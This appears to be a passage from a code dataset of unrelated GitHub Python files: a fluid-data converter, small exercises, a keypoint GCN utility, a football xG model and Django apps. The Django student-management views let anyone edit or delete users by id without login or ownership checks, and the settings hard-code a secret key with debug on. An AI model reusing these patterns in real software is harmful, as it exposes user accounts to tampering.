data[0].index(mappings[item])\n\n if item == 'Pkrit / MPa':\n element = round(float(d[element_idx].split('*')[0])/1000,4)\n element = str(element)\n else:\n element = d[element_idx].split('*')[0].lower()\n y.append(element)\n else:\n \n if item in gr_skip:\n continue\n\n if item == 'g1':\n groups = []\n\n\n group_code = d[-1]\n \n if group_code != 'n.a.':\n \n\n group_list = group_code.split(\";\")\n group_list = [i.strip() for i in group_list]\n\n for ele in group_list:\n amount = int(ele.split('×')[0])\n group = ele.split('×')[1]\n # amount = int(ele.split('×')[0])\n # group = ele.split('×')[1]\n \n\n\n groups += amount*[group]\n y[-1] = str(len(groups))\n i += len(groups)\n for k in range(len(groups)):\n gr_skip.append(\"g\"+str(k+1))\n y.append(groups[k])\n continue\n \n if item == \"M / (g/mol)\":\n # calculate molar mass\n\n mass = 0\n\n C_mass = 12.01\n O_mass = 16\n H_mass = 1\n Br_mass = 79.9\n Si_mass = 28.08\n N_mass = 14\n F_mass = 18.99\n Cl_mass = 35.4\n S_mass = 32.06\n I_mass = 126.9\n\n formula = d[1]\n \n mass = round(molar_mass(formula),2)\n \n y.append(str(mass))\n continue\n\n y.append('0')\n fluids.append(y)\n fluids.append(['@END'])\n return fluids\n\ndef read_systems(filename):\n\n path = os.path.join(sys.path[0], filename + \".json\")\n with open(path) as f:\n data = json.loads(f.read())\n\n return data\n\ndef check_systems(systems, data):\n\n res = {}\n\n found = 0\n number = len(systems)\n\n for ele in systems.keys():\n\n res[ele] = None\n ele_cas = systems[ele]['CAS']\n\n for i in range(len(data)-1):\n data_cas = data[i][2]\n if ele_cas == data_cas:\n found += 1\n data_ele = data[i][0]\n res[ele] = data_ele\n break\n\n \n\n return (res, number, found)\n\n\ndef molar_mass(formula):\n weights = {\n 'C': 12.01,\n 'O': 16,\n 'H': 1,\n 'Br': 79.9,\n 'Si': 28.08,\n 'N': 14,\n 'F': 18.99,\n 'Cl': 35.4,\n 'S': 32.06,\n 'I': 126.9\n }\n result = 0\n for item in re.findall('[A-Z][a-z]*[0-9]*', formula):\n m = re.match('([A-Z][a-z]*)(\\d+)*', item)\n if m:\n if m.groups()[1] != None:\n test = m.groups()\n result += weights[m.group(1)] * int(m.group(2))\n else:\n result += weights[m.group(1)]\n\n return result\n\nfld_to_csv(fluids_file_name)\ndata = read_csv(data_file_name)\nfluids = read_csv(fluids_file_name)\n\ntest = list(list(zip(*fluids))[0])\n\nlength = []\n\nfor i in range(1,len(test)):\n length.append(len(test[i]))\n\nprint(str(max(length)))\n\n\n\nmappings = {\n# 996 ['english name', 'formula', 'CAS-nr.', 'Tc,i / K', 'Pc,i / kPa', 'vc,i / cm3 mol-1', 'ωi', 'c1,i', 'c2,i', 'c3,i', 'Tmin / K', 'Tmax / K', 'increments [counter × sub group number]']\n# 136 ['BEZEICHNUNG', 'ALTERNATIVER NAME', 'CAS-NR', 'M / (g/mol)', 'Azentr. Fak.', 'Pkrit / MPa', 'Tcrit / K', 'Ptr / Mpa', 'Ttr / K', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'c1', 'c2', 'c3', 'nr_of_groups', 'g1', 'g2', 'g3', 'g4', 'g5', 'g6', 'g7', 'g8', 'g9', 'g10', 'g11', 'g12', 'g13', 'g14', 'g15', 'g16', 'g17', 'g18', 'g19', 'g20', 'g21', 'g22', 'g23', 'g24', 'g25', 'g26', 'g27', 'g28', 'g29'] ''\n 'BEZEICHNUNG': 'english name',\n 'ALTERNATIVER NAME': 'english name',\n 'CAS-NR': 'CAS-nr.',\n 'Tcrit / K': 'Tc,i / K',\n 'Pkrit / MPa': 'Pc,i / kPa',\n 'Azentr. Fak.': 'ωi',\n 'c1': 'c1,i', \n 'c2': 'c2,i', \n 'c3': 'c3,i'\n}\n\n\nmerged = merge(data, fluids, mappings)\n# print(len(fluids), fluids[0])\nwrite_fld(\"test\", merged)\nsystems = read_systems(\"database_components\")\n\n\n\n\nres, n_sys, n_found = check_systems(systems, merged)\n\nwrite_mappings(res, \"mappings\")\n\nfound_per = round(n_found/n_sys * 100, 0)\n\nprint(str(found_per) + \" % gefunden\")","repo_name":"fischer-sw/thesis-daniel-benchmark-thermo","sub_path":"Daten/srk_fldfile/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19234236367","text":"import timeit\n\nmenu = [\n [\"egg\", \"spam\", \"bacon\"],\n [\"egg\", \"sausage\", \"bacon\"],\n [\"egg\", \"spam\"],\n [\"egg\", \"bacon\", \"spam\"],\n [\"egg\", \"bacon\", \"sausage\", \"spam\"],\n [\"spam\", \"bacon\", \"sausage\", \"spam\"],\n [\"spam\", \"egg\", \"spam\", \"spam\", \"bacon\", \"spam\"],\n [\"spam\", \"egg\", \"sausage\", \"spam\"],\n [\"chicken\", \"chips\"]\n]\n\n\nfor meal in menu:\n if \"spam\" not in meal:\n print(meal)\n\nprint(\"-\" * 40)\n\n\ndef spamless_comp():\n # meals = [meal for meal in menu if \"spam\" not in meal] # using inline\n meals = [meal for meal in menu if not_spam(meal)] # using function\n return meals\n\n\nprint(\"-\" * 40)\n\n\ndef not_spam(meal_list: list):\n \"\"\"\n Filter\n :param meal_list:\n :return:\n \"\"\"\n return \"spam\" not in meal_list\n\n\ndef spamless_filter():\n spam_less_meals = list(filter(not_spam, menu))\n return spam_less_meals\n\n\nif __name__ == '__main__':\n print(spamless_comp())\n print(spamless_filter())\n print(timeit.timeit(spamless_comp, number=100000))\n print(timeit.timeit(spamless_filter, number=100000))\n","repo_name":"kumarvgit/python3","sub_path":"map/filtertest.py","file_name":"filtertest.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23775480831","text":"'''\n823. Binary Trees With Factors\nMedium\n\n1286\n\n134\n\nAdd to List\n\nShare\nGiven an array of unique integers, arr, where each integer arr[i] is strictly greater than 1.\n\nWe make a binary tree using these integers, and each number may be used for any number of times. Each non-leaf node's value should be equal to the product of the values of its children.\n\nReturn the number of binary trees we can make. The answer may be too large so return the answer modulo 109 + 7.\n\n \n\nExample 1:\n\nInput: arr = [2,4]\nOutput: 3\nExplanation: We can make these trees: [2], [4], [4, 2, 2]\nExample 2:\n\nInput: arr = [2,4,5,10]\nOutput: 7\nExplanation: We can make these trees: [2], [4], [5], [10], [4, 2, 2], [10, 2, 5], [10, 5, 2].\n \n\nConstraints:\n\n1 <= arr.length <= 1000\n2 <= arr[i] <= 109\nAll the values of arr are unique.\nAccepted\n48,685\nSubmissions\n105,462\n'''\nclass Solution:\n def numFactoredBinaryTrees(self, arr: List[int]) -> int:\n arr.sort()\n mod = 10**9+7\n n = len(arr)\n index = {x: i for i, x in enumerate(arr)}\n dp = [1]*n\n for i, x in enumerate(arr):\n for j in range(i):\n if x % arr[j] == 0: #arr[j] will be left child\n right = x//arr[j]\n if right in index:\n dp[i] += dp[j]*dp[index[right]]\n dp[i] %= mod\n return sum(dp)%mod","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2022/08. Aug/09.numFactoredBinaryTrees.py","file_name":"09.numFactoredBinaryTrees.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13381501145","text":"import numpy as np\nimport pandas as pd\nfrom kp_utils import extract_vid_keypoints\nfrom data_utils import get_json_as_df\nimport os\n\ngcn_input_dir = './data/gcn_input/' # define gcn input directory\nos.makedirs(gcn_input_dir, exist_ok=True)\n\n# generate adjacency and feature matrices for all videos across some subset of glosses,\n# across splits, then save each as numpy arrays in dedicated directory\ndef save_vids_gcn_input(gloss_inst_df, glosses_to_test, holistic=True):\n mp_dir = 'holistic' if holistic else 'pose'\n gloss_groups = gloss_inst_df.groupby('gloss') #group rows in json df with all instances by gloss\n\n for gloss, gloss_df in gloss_groups:\n\n if gloss in glosses_to_test:\n split_groups = gloss_df.groupby('split') #group rows in the df for this gloss by type of split; not all glosses have every type\n\n for split, split_df in split_groups:\n split_df = split_df.reset_index(drop=True)\n adj_file_path = f\"{gcn_input_dir}{mp_dir}/{split}/adj_mats/\" #specify path to our adjacency matrices (NxN)\n node_ft_file_path = f\"{gcn_input_dir}{mp_dir}/{split}/node_ft_mats/\" #specify path to our node feature matrices (NxD)\n\n os.makedirs(adj_file_path, exist_ok=True)\n os.makedirs(node_ft_file_path, exist_ok=True)\n\n print(f\"Saving gcn_input for gloss {gloss}, split {split}\")\n for i in range(split_df.shape[0]):\n vid_id = split_df.loc[i, 'video_id']\n \n ft_path = f\"{node_ft_file_path}{vid_id}_{gloss}.npy\"\n adj_path = f\"{adj_file_path}{vid_id}_{gloss}.npy\"\n\n # save keypoint features, adjacency matrix for this video \n if not(os.path.exists(ft_path)):\n # generate keypoint features from keypoints\n kp_ft = create_keypoint_features(vid_id)\n np.save(ft_path, np.array(kp_ft))\n \n # if not(os.path.exists(adj_path)): #don't bother generating again\n # # generate adjacency matrix from keypoint features\n # kp_adj = create_adjacency_matrix(kp_ft)\n # np.save(adj_path, np.array(kp_adj))\n\n# extract the keypoint features, and reshape the mean keypoint values across frames to obtain matrix of size N, D\n# where N is the number of nodes and D is the number of input features (x, y, z, visibility)\ndef create_keypoint_features(video_id):\n # Extract keypoints for the video_id using the extract_vid_keypoints function\n keypoints_list, _ = extract_vid_keypoints(video_id, gcn_input=True)\n\n # Convert keypoints list into a NumPy array\n keypoints_array = np.array(keypoints_list)\n\n # Calculate the mean keypoints across all frames of the video\n mean_keypoints = np.mean(keypoints_array, axis=0)\n\n return mean_keypoints.reshape(-1, 4)\n\n# create adjacency matrix of size N,N where N is the number of nodes in the graph\ndef create_adjacency_matrix(keypoint_features):\n num_keypoints = keypoint_features.shape[0]\n adjacency_matrix = np.zeros((num_keypoints, num_keypoints))\n\n for i in range(num_keypoints):\n for j in range(num_keypoints):\n distance = np.linalg.norm(keypoint_features[i, :2] - keypoint_features[j, :2])\n adjacency_matrix[i, j] = 1 / (1 + distance)\n\n return adjacency_matrix\n","repo_name":"yasminfarhan/Sign-Language-Decoding","sub_path":"dgcn_utils.py","file_name":"dgcn_utils.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26334068945","text":"from django.shortcuts import render\nimport json\n\nfrom .models import Roommate\n\n\ndef index(request):\n # Load overview\n overview_file = open('overview.json', 'r')\n users = json.load(overview_file)['results']\n\n # Define all roommates\n roommate1 = Roommate(users[0])\n roommate2 = Roommate(users[1])\n roommate3 = Roommate(users[2])\n roommates = (roommate1, roommate2, roommate3)\n\n # Find all time best and best max\n top_score = max([roommate.total_pullups for roommate in roommates])\n top_max = max([roommate.max_pullups for roommate in roommates])\n for roommate in roommates:\n if roommate.total_pullups == top_score:\n top_alltime = roommate\n if roommate.max_pullups == top_max:\n top_max_roommate = roommate\n\n # Find amount of daily wins\n number_of_days = json.load(open('sams_days.json', 'r'))['count']\n sams_days = json.load(open('sams_days.json', 'r'))['results']\n zachs_days = json.load(open('zachs_days.json', 'r'))['results']\n jarrods_days = json.load(open('jarrods_days.json', 'r'))['results']\n roommate_days = (sams_days, zachs_days, jarrods_days)\n\n sam_wins = 0\n zach_wins = 0\n jarrod_wins = 0\n i = 0\n while i < number_of_days:\n best_score = 0\n for days in roommate_days:\n if days[i]['total'] > best_score:\n best_score = days[i]['total']\n best_user = days[i]['user_name']\n if best_user == 'Sam':\n sam_wins += 1\n if best_user == 'Blade':\n zach_wins += 1\n if best_user == 'J-bod':\n jarrod_wins += 1\n i += 1\n\n wins = (sam_wins, zach_wins, jarrod_wins)\n max_wins = max(wins)\n if max_wins == sam_wins:\n daily_wins_winner = 'Sam'\n elif max_wins == zach_wins:\n daily_wins_winner = 'Blade'\n elif max_wins == jarrod_wins:\n daily_wins_winner = 'J-bod'\n\n context = {\n 'roommates': roommates,\n 'alltimechamp': top_alltime,\n 'topmax': top_max_roommate,\n 'daily_wins_winner': daily_wins_winner,\n 'daily_wins_top': max_wins,\n }\n\n return render(request, 'index.html', context)\n\n\ndef explanation(request):\n context = {}\n return render(request, 'explanation.html', context)\n","repo_name":"samdowd/pullup-tracker","sub_path":"pullupstats/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6626184668","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 15 10:41:19 2023\r\n\r\n@author: hamad\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pitch\r\nimport matplotlib.pyplot as plt\r\n#import machine learning libraries \r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom tensorflow.keras import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.callbacks import EarlyStopping\r\n\r\ndf = pd.read_csv('../data/freeKicks.csv')\r\n\r\ncolumns = ['distance', 'distance_squared', 'distance_cube', 'adj_distance',\r\n 'adj_distance_squared', 'adj_distance_cube','angle', 'arc_length']\r\n\r\n\r\nfreeKickShot=df[df['free_kick_type']=='free_kick_shot']\r\n\r\n\r\n\r\n\r\nfreeKickCross=df[df['free_kick_type']=='free_kick_cross']\r\n#construct the feature matrix and the target variable\r\nX = freeKickShot[columns]\r\ny = freeKickShot['goal']\r\n\r\n\r\n\r\n#spllit the data to train, validation and test\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.6, random_state = 123, stratify = y)\r\nX_cal, X_val, y_cal, y_val = train_test_split(X_test, y_test, train_size = 0.5, random_state = 123, stratify = y_test)\r\n\r\n#scale data\r\nscaler = StandardScaler()\r\nX_train = scaler.fit_transform(X_train)\r\nX_val = scaler.transform(X_val)\r\nX_cal = scaler.transform(X_cal)\r\n\r\n#creating a function with a model architecture\r\ndef create_model():\r\n model = Sequential([\r\n Dense(10, activation='relu'),\r\n Dense(10, activation='relu'),\r\n Dense(10, activation='relu'),\r\n Dense(1, activation = 'sigmoid'),\r\n ])\r\n opt = Adam(learning_rate=0.001, beta_1=0.9, beta_2=0.999)\r\n model.compile(optimizer=opt, loss=\"mean_squared_error\" , metrics=['accuracy'])\r\n return model\r\n\r\n#create model\r\nmodel = create_model()\r\n\r\n#create an early stopping object\r\ncallback = EarlyStopping(min_delta=1e-5, patience = 50, mode = \"min\", monitor = \"val_loss\", restore_best_weights=True)\r\n\r\n#fit the model \r\nhistory = model.fit(X_train, y_train, validation_data=(X_val, y_val), epochs=1000, verbose=1, batch_size=16, callbacks = [callback]) \r\n\r\nfig, axs = plt.subplots(2, figsize=(10,12))\r\n#plot training history - accuracy\r\naxs[0].plot(history.history['accuracy'], label='train') \r\naxs[0].plot(history.history['val_accuracy'], label='validation')\r\naxs[0].set_title(\"Accuracy at each epoch\")\r\naxs[0].set_xlabel(\"Epoch\")\r\naxs[0].set_ylabel(\"Accuracy\")\r\naxs[0].legend()\r\n\r\n#plot training history - loss function\r\naxs[1].plot(history.history['loss'], label='train') \r\naxs[1].plot(history.history['val_loss'], label='validation')\r\naxs[1].legend()\r\naxs[1].set_title(\"Loss at each epoch\")\r\naxs[1].set_xlabel(\"Epoch\")\r\naxs[1].set_ylabel(\"MSE\")\r\nplt.show()\r\n\r\n##############################################################################\r\n# Assessing our model\r\n# ----------------------------\r\n# To assess our model, we calculate ROC AUC and investigate calibration curves. From the plots we can see that some of higher probabilities are\r\n# underestimated by our model, but these are satisfactory results given the number of data we have and a shallow network. Also, we calculate Brier score\r\n# on unseen data. It amounts to 0.08, which is a good score. \r\n\r\n#ROC CURVE\r\nfrom sklearn.metrics import roc_curve, roc_auc_score, brier_score_loss\r\nfig, axs = plt.subplots(2, figsize=(10,12))\r\ny_pred = model.predict(X_cal)\r\nfpr, tpr, _ = roc_curve(y_cal, y_pred)\r\nauc = roc_auc_score(y_cal, y_pred)\r\naxs[0].plot(fpr,tpr,label= \"AUC = \" + str(auc)[:4])\r\naxs[0].plot([0, 1], [0, 1], color='black', ls = '--')\r\naxs[0].legend()\r\naxs[0].set_ylabel('True Positive Rate')\r\naxs[0].set_xlabel('False Positive Rate')\r\naxs[0].set_title('ROC curve')\r\n\r\n#CALIBRATION CURVE\r\nfrom sklearn.calibration import calibration_curve\r\nprob_true, prob_pred = calibration_curve(y_cal, y_pred, n_bins=10)\r\naxs[1].plot(prob_true, )\r\naxs[1].plot([0, 1], [0, 1], color='black', ls = '--')\r\naxs[1].set_ylabel('Empirical Probability')\r\naxs[1].set_xlabel('Predicted Probability')\r\naxs[1].set_title(\"Calibration curve\")\r\nplt.show()\r\n#Brier score\r\nprint(\"Brier score\", brier_score_loss(y_cal, y_pred))\r\n\r\n\r\n#store data in a matrix\r\nX_unseen = freeKickShot[columns]\r\n\r\n#scale data\r\nX_uns = scaler.transform(X_unseen)\r\n\r\n#make predictions\r\nxgs_shot= model.predict(X_uns)\r\n\r\n#find xG\r\nfreeKickShot[\"our_xG\"] = xgs_shot\r\n\r\n\r\n\r\n#Create a 2D map of xG\r\npgoal_2d_shot=np.zeros((68,68))\r\nfor x in range(68):\r\n for y in range(68):\r\n \r\n# We divide the penalty area to three sections: to the left, above of penalty area and to the right.\r\n# In each section, we create a data frame for every point and then to apply our model \r\n# to predict the probability to score\r\n\r\n # Compute probability of goal to above of penalty area \r\n if (y>14) & (y<=53)& (x>=16.5):\r\n # in this section we create a data frame \r\n xG=pd.DataFrame(columns=['distance', 'distance_squared', 'distance_cube', 'adj_distance',\r\n 'adj_distance_squared', 'adj_distance_cube','angle', 'arc_length'])\r\n #angle\r\n angle = np.arctan(7.32 *x /(x**2 + abs(y-68/2)**2 - (7.32/2)**2))\r\n if angle<0:\r\n angle= np.pi + angle\r\n #distance\r\n distance=np.sqrt(x**2+y**2)\r\n \r\n #distance squared\r\n distance_squared=np.power(distance,2)\r\n \r\n #distance cube\r\n distance_cube=np.power(distance,3)\r\n \r\n #adjusted distance\r\n adj_distance=abs(distance-16.5)\r\n \r\n #adjusted distance squared\r\n adj_distance_squared=np.power(adj_distance,2)\r\n \r\n # adjusted distance cube\r\n adj_distance_cube=np.power(adj_distance,3)\r\n \r\n #arc length\r\n arc_length=distance*angle\r\n #\r\n xG['distance']=[distance]\r\n #arc length\r\n xG['arc_length']=[arc_length]\r\n\r\n #distance squared\r\n xG['distance_squared']=[distance_squared]\r\n\r\n #distance cube\r\n xG['distance_cube']=[np.power(distance,3)]\r\n # adjusted distance\r\n xG['adj_distance']=[adj_distance]\r\n\r\n #adjusted distance squared\r\n xG['adj_distance_squared']=[adj_distance_squared]\r\n\r\n #adjusted distance cube\r\n xG['adj_distance_cube']=[adj_distance_cube]\r\n\r\n #angle\r\n xG['angle']=[angle]\r\n #scale data\r\n X_uns = scaler.transform(xG)\r\n #make predictions\r\n xg= model.predict(X_uns)*100\r\n pgoal_2d_shot[x,y]=xg\r\n # Compute probability of goal to the right of penalty area \r\n if (y>53):\r\n xG=pd.DataFrame(columns=['distance', 'distance_squared', 'distance_cube', 'adj_distance',\r\n 'adj_distance_squared', 'adj_distance_cube','angle', 'arc_length'])\r\n #angle\r\n angle = np.arctan(7.32 *x /(x**2 + abs(y-68/2)**2 - (7.32/2)**2))\r\n if angle<0:\r\n angle= np.pi + angle\r\n #distance\r\n distance=np.sqrt(x**2+y**2)\r\n #distance squared\r\n distance_squared=np.power(distance,2)\r\n #distance cube\r\n distance_cube=np.power(distance,3)\r\n #adjusted distance\r\n adj_distance=abs(distance-16.5)\r\n #adjusted distance squared\r\n adj_distance_squared=np.power(adj_distance,2)\r\n # adjusted distance cube\r\n adj_distance_cube=np.power(adj_distance,3)\r\n #arc length\r\n arc_length=distance*angle\r\n #\r\n xG['distance']=[distance]\r\n #arc length\r\n xG['arc_length']=[arc_length]\r\n\r\n #distance squared\r\n xG['distance_squared']=[distance_squared]\r\n\r\n #distance cube\r\n xG['distance_cube']=[np.power(distance,3)]\r\n # adjusted distance\r\n xG['adj_distance']=[adj_distance]\r\n\r\n #adjusted distance squared\r\n xG['adj_distance_squared']=[adj_distance_squared]\r\n\r\n #adjusted distance cube\r\n xG['adj_distance_cube']=[adj_distance_cube]\r\n\r\n #angle\r\n xG['angle']=[angle]\r\n #scale data\r\n X_uns = scaler.transform(xG)\r\n #make predictions\r\n xg= model.predict(X_uns)*100\r\n pgoal_2d_shot[x,y]=xg\r\n \r\n # Compute probability of goal to the left of penalty area \r\n if (y<=14):\r\n xG=pd.DataFrame(columns=['distance', 'distance_squared', 'distance_cube', 'adj_distance',\r\n 'adj_distance_squared', 'adj_distance_cube','angle', 'arc_length'])\r\n #angle\r\n angle = np.arctan(7.32 *x /(x**2 + abs(y-68/2)**2 - (7.32/2)**2))\r\n if angle<0:\r\n angle= np.pi + angle\r\n #distance\r\n distance=np.sqrt(x**2+y**2)\r\n #distance squared\r\n distance_squared=np.power(distance,2)\r\n #distance cube\r\n distance_cube=np.power(distance,3)\r\n #adjusted distance\r\n adj_distance=abs(distance-16.5)\r\n #adjusted distance squared\r\n adj_distance_squared=np.power(adj_distance,2)\r\n # adjusted distance cube\r\n adj_distance_cube=np.power(adj_distance,3)\r\n #arc length\r\n arc_length=distance*angle\r\n #\r\n xG['distance']=[distance]\r\n #arc length\r\n xG['arc_length']=[arc_length]\r\n\r\n #distance squared\r\n xG['distance_squared']=[distance_squared]\r\n\r\n #distance cube\r\n xG['distance_cube']=[np.power(distance,3)]\r\n # adjusted distance\r\n xG['adj_distance']=[adj_distance]\r\n\r\n #adjusted distance squared\r\n xG['adj_distance_squared']=[adj_distance_squared]\r\n\r\n #adjusted distance cube\r\n xG['adj_distance_cube']=[adj_distance_cube]\r\n\r\n #angle\r\n xG['angle']=[angle]\r\n #scale data\r\n X_uns = scaler.transform(xG)\r\n #make predictions\r\n xg= model.predict(X_uns)*100\r\n pgoal_2d_shot[x,y]=xg\r\n\r\n\r\n\r\n\r\n#plot pitch\r\n(fig,ax) = pitch.createGoalMouth()\r\n\r\n#plot probability\r\npos = ax.imshow(pgoal_2d_shot, extent=[-1,68,68,-1], aspect='auto',cmap=plt.cm.Reds,vmin=0, vmax=10, zorder = 1)\r\nfig.colorbar(pos, ax=ax)\r\n\r\n\r\n","repo_name":"hamadkiema1991/Shots-in-football","sub_path":"freekick_analysis/neuronal_network_model.py","file_name":"neuronal_network_model.py","file_ext":"py","file_size_in_byte":10351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20116696162","text":"from django.shortcuts import render, reverse, get_object_or_404, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom Student_Management.decorators import role_required\nfrom user_management.forms import *\nfrom rest_framework import viewsets\nfrom .serializers import *\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n\ndef home(request):\n if request.user.username:\n if request.user.profile.profilerole.name == 'Student':\n return redirect('/details/' + str(request.user.id) + '/')\n return HttpResponseRedirect(reverse('user_list'))\n else:\n return HttpResponseRedirect(reverse('user_login'))\n #return HttpResponse('hello')\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin','Staff','Instructor'])\ndef user_list(request):\n #print(request.user.profile.profilerole)\n context = {}\n users = Profile.objects.all()\n grouprole = Group.objects.all()[3]\n context['usertype'] = 'Students'\n context['users'] = Profile.objects.filter(profilerole = grouprole)\n #return HttpResponse('hello')\n return render(request, 'user_management/index.html', context)\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin'])\ndef staff_list(request):\n #print(request.user.profile.profilerole)\n context = {}\n users = Profile.objects.all()\n grouprole = Group.objects.all()[1]\n context['usertype'] = 'Staff'\n context['users'] = Profile.objects.filter(profilerole = grouprole)\n #return HttpResponse('hello')\n return render(request, 'user_management/index.html', context)\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin','Staff'])\ndef instructor_list(request):\n #print(request.user.profile.profilerole)\n context = {}\n users = Profile.objects.all()\n grouprole = Group.objects.all()[2]\n context['usertype'] = 'Instructor'\n context['users'] = Profile.objects.filter(profilerole = grouprole)\n #return HttpResponse('hello')\n return render(request, 'user_management/index.html', context)\n\ndef user_add(request):\n context = {}\n if request.method == 'POST':\n user_form = UserForm(request.POST)\n context['user_form'] = user_form\n if user_form.is_valid():\n u = user_form.save()\n userprofile = get_object_or_404(Profile, user_id=u.id)\n profile_form = ProfileForm(instance=userprofile)\n return render(request, 'user_management/editp.html', {\"user_form\": profile_form, \"id\":u.id})\n else:\n return render(request, 'user_management/add.html', context)\n else:\n user_form = UserForm()\n context['user_form'] = user_form\n return render(request, 'user_management/add.html', context)\n\ndef profile_edit(request, id):\n user = get_object_or_404(Profile, user_id=id)\n if request.method == 'POST':\n profile_form = ProfileForm(request.POST, request.FILES, instance=user)\n if profile_form.is_valid():\n profile_form.save()\n if request.user.profile.profilerole.name == 'Student':\n return redirect('/details/'+str(user.id)+'/')\n return HttpResponseRedirect(reverse('user_list'))\n else:\n return render(request, 'user_management/editp.html', {\"user_form\": profile_form, 'id':id})\n else:\n profile_form = ProfileForm(instance=user)\n return render(request, 'user_management/editp.html', {\"user_form\": profile_form, 'id':id})\n\n@login_required(login_url='/login/')\ndef profile_details(request, id=None):\n context = {}\n context['userprofile'] = get_object_or_404(User, id=id)\n print(get_object_or_404(User, id=id))\n #return HttpResponse('hello')\n return render(request, 'user_management/details.html', context)\n\ndef user_delete(request, id=None):\n user = get_object_or_404(User, id=id)\n if request.method == 'POST':\n if request.user.profile.profilerole.name == 'Student':\n user.delete()\n return redirect('/login/')\n print(type(user))\n user.delete()\n return HttpResponseRedirect(reverse('user_list'))\n else:\n context = {}\n context['userprofile'] = user\n return render(request, 'user_management/delete.html', context)\n\ndef user_login(request):\n context = {}\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user:\n login(request, user)\n\n if request.GET.get('next', None):\n return HttpResponseRedirect(request.GET['next'])\n if user.profile.profilerole.name == 'Student':\n return redirect('/details/'+str(user.id)+'/')\n return HttpResponseRedirect(reverse('user_list'))\n else:\n context['error'] = 'Invalid Credentials'\n return render(request, 'user_management/login.html', context=context)\n else:\n return render(request, 'user_management/login.html', context=context)\n\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect(reverse('user_login'))\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin','Staff','Instructor'])\ndef student_attendance(request):\n context = {}\n if request.method == 'POST':\n attendanceForm = AttendanceForm(request.POST)\n context['attendanceForm'] = attendanceForm\n if attendanceForm.is_valid():\n attendanceForm.save()\n return HttpResponseRedirect(reverse('user_list'))\n else:\n attendanceForm = AttendanceForm()\n context['attendanceForm'] = attendanceForm\n return render(request, 'user_management/attendance.html', context)\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin','Staff'])\ndef student_attendance_record(request):\n context={}\n context['records'] = Attendance.objects.all()\n return render(request, 'user_management/records.html', context)\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin','Staff'])\ndef student_attendance_report(request):\n rollnumber = request.POST['rollnumber']\n print(rollnumber)\n context={}\n records = Attendance.objects.all()\n total_count = records.count()\n present_record = []\n for record in records:\n if rollnumber in record.studentList:\n present_record.append((record.completeDateTime).strftime('%m/%d/%Y'))\n present_count = len(present_record)\n percent_attendance = (present_count/total_count)*100\n print(percent_attendance)\n context['present_record'] = present_record\n context['percent_attendance'] = percent_attendance\n return render(request, 'user_management/report.html', context)\n","repo_name":"salvieknath18/python_work","sub_path":"Django/Student_Management/user_management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70101235434","text":"\"\"\"\nDjango settings for backend project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.8/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.8/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '*3ryzqwd5-ndmywi1#w%31hs@rj8wo+^u8b+7_fc+^0se0kp(('\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'rest_framework',\n\n 'apps.sampleapp'\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nWSGI_APPLICATION = 'wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.8/ref/settings/#databases\n\nDATABASES = 